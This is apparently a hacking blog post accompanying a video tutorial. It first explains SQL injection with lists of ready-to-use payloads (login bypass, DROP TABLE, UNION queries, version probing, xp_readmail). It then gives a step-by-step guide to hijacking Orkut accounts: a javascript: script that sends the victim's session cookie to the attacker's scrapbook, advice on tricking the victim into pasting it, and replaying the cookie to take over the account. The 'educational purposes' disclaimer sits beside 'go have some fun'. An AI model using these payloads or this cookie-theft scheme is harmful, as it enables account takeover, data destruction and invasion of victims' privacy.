Do subscribe and say thanks, If you like this video tutorial..

You can download the shown strings in the video from Here:

Click Here To Download!

Video only for educational purposes only!

SQL injection is most common methodology employed by a hacker to exploit vulnerabilities in software applications. Vulnerabilities are basically weak links in the software that exposes unauthorized data/information to a user. SQL injection occurs when the user input is incorrectly filtered for embedded SQL statements.
The technique is powerful enough not only to expose the information to the user but also modify and delete the content which could prove disastrous to the company.

SQL injection vulnerabilities have three forms:

Incorrectly filtered special characters: escape characters

This form of SQL injection occurs when the user manipulates the SQL statements using characters such as  ’.  For instance consider that you need to enter username and password while logging into your account. The SQL statement generated will be:
“SELECT * FROM users WHERE password =    ’” + password + “‘;”

Now suppose the userName and/or password so entered are”  ‘ or ‘1’=’1”. So the SQL statement reaching the back end will be:

“SELECT * FROM users WHERE password =’  ‘or ‘1’=’1 ‘;”

Look closely at this statement. It is deciphered by the database as select everything from the table “user” having field name equal to ‘ ‘ or 1=1. During authentication process, this condition will always be valid as 1 will always equal 1. Thus this way the user is given unauthorized access.

List of Some Important inputs used by hackers to use SQL Injection technique are:
a)  ‘ or ‘a’=’a
b)  ‘ or 1=1 –
c)  ‘ or 1=1; –
d)  ‘; select * from *; –
e)  ‘ (Single quote)(Here we look at the error)
f)  ‘; drop table users –

On some SQL servers such as MS SQL Server any valid SQL command may be injected via this method, including the execution of multiple statements. The following value of “username” in the statement below would cause the deletion of the “users” table as well as the selection of all data from the “data” table (in essence revealing the information of every user):
a’;DROP TABLE users; SELECT * FROM data WHERE name LIKE ‘%

Incorrectly handling input data type

This form of SQL injection occurs when the user input is not strongly typed i.e. , the input by the user is not checked for data type constraint. For example consider a field where you are asked to enter your phone number. Since the phone number input is of numeric data type, therefore the input must be checked whether it is numeric or not. If not checked, then the user can send alphanumeric input and embedded SQL statements. Consider the following SQL statement:
“SELECT * FROM user WHERE telephone = “+ input +”;”
Now if I can input alphanumeric data say “11111111;DROP TABLE user” then I have embedded an SQL statement to delete the entire table “user”. This might prove detrimental to the company!!!

If you happen to know the database table name and column names, then any user can perform SQL injection using the following inputs:

1. ‘ having 1=1 –
2. ‘ group by user.id having 1=1 –
3. ‘ group by users.id, users.username, users.password, users.privs having 1=1—
4. ‘ union select sum(users.username) from users—
5. ‘ union select sum(id) from users –

Vulnerabilities inside the database server

Sometimes vulnerabilities can exist within the database server software itself, as was the case with the MySQL server’s real_escape_chars() functions.
If the database server is not properly configured then the access to the database can easily be found out by the hacker.
The hacker can get information regarding the database server using the following input:
‘ union select @@version,1,1,1—

1. Extended Stored Procedure Attacks
2. sp_who: this will show all users that are currently connected to the database.
3. xp_readmail, , , , ,@peek=’false’ : this will read all the mails and leave the message as unread.

In the same way there is a list of such extended stored procedures that can be used by the hacker to exploit vulnerabilities existing in software application at the database layer.

Follow the procedure and guess what…..You’ll learn another trick to hack orkut accounts apart from password stealing or Phishing.

Let me tell you guys again that- “THIS TUTORIAL IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHORS OF HACKINGARTICLES.COM ARE NOT LIABLE FOR ANY ILLEGAL ACT CARRIED OUT BY YOU OR ANYONE ELSE.”

Now without wasting anytime read the following procedure:

1.Firstly you need to have Mozilla firefox installed.
2.Download cookie editor plugin for Mozilla firefox from:

COOKIE EDITOR

3.You need to have two fake accounts to Hack Orkut or Gmail , So that you have to receive cookies to one Orkut account and other Orkut account for Advertising your Script, Well it depends on your Choice to have Two Gmail(Orkut) accounts.

Cookie Script:

javascript:nobody=replyForm;nobody.toUserId.value=34536569;
nobody.scrapText.value=document.cookie;nobody.action=’scrapbook.aspx?
Action.submit’;nobody.submit()

How to use cookies script?

1. Replace your Uid number “UserId.value=34536569?
How to Replace your Uid
1. Go to your album
2. Right click on any Photo> Properties>55886645.jpg It will be a Eight Digit Value.
3. Now replace your value with the value in the java script.
Your script will look like.

javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=document.cookie;nobody.action=’scrapbook.aspx?
Action.submit’;nobody.submit()

2.Now send this Cookie script to the victim and ask him to paste in Address bar and Press enter

3.You’ll Get his cookie in your scrapbook.

4.After Getting a cookie go to your orkut Home page , Then click on Tools tab and then go to cookie editor plugin( Tools–> Cookie editor)

5.click filter/refresh.look for ‘orkut_state’ cookie. just double click it and replace the orkut_state part with your victim’s Script
put ur eight digit number in the place of (34536569).

Thats it your done with.

Logout of your orkut and login again and you’ll be in your victims Homepage.

6.So remember guys…if ur on orkut or having any other account….never click or paste in address bar any suspicious script to prevent anyone from hacking/accessing your account.

I hope you have learned how to hack orkut accounts using cookie stealing. Just the script can be used to hack orkut accounts and then access victim’s orkut account. You wont be hacking any password here. But just the cookies. Go have some fun with it and Do Not Forget To Subscribe.